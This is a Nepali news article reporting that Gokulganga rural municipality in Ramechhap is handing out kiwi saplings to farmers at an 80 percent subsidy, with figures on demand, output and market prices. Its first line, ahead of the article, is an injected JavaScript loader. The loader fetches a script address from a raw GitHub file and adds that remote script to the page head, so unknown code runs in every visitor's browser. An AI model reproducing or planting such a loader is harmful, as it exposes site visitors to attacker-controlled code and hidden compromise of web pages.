;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
माघ १४,
रामेछाप । रामेछापको गोकुलगंगा गाउँपालिकाले ८० प्रतिशत अनुदानमा किसानहरुलाई किवीको बिरुवा वितरण गरेको छ ।
बुधबार गाउँपालिकाले किवी उत्पादनलाई वृद्धि गर्ने उदेश्यका साथ किसानहरुको २० प्रतिशत लगानीमा बिरुवा उपलब्ध गराएको गाउँपालिकाका प्रमुख खड्क बहादुर सुनुवारेले जुनेली न्युजलाई जानकारी दिए । उनले भने-हामीलाई ३० हजार बिरुवाको माग किसानहरुबाट आएको थियो, हामीला ३ हजार मात्रै बिरुवा ल्याउन सक्यौं र आजबाट वितरण सुरु गरेका छौं ।
चालु आर्थिक वर्षमा त्यहाँ २० टन किवी उत्पादन भएको उनको भनाई छ । हाल स्वास्थ्यका दृष्टिले निकै फाइदाजनक फलको रुपमा हेरिने किवी बजारमा मूल्य भने नतोकिदा किसानहरु समस्यामा नै छन् । जिल्लाको बजार भाउ किलोको २ सय रुपैयाँदेखि ३० सयसम्म खरिद् बिक्री हुदै आएको छ ।
गोकुलगंगा गाउँपालिकाले किवीसहितका नगदेबाली उत्पादनमा जोड्दिदै आएको छ ।
फेसबुक प्रतिक्रियाहरु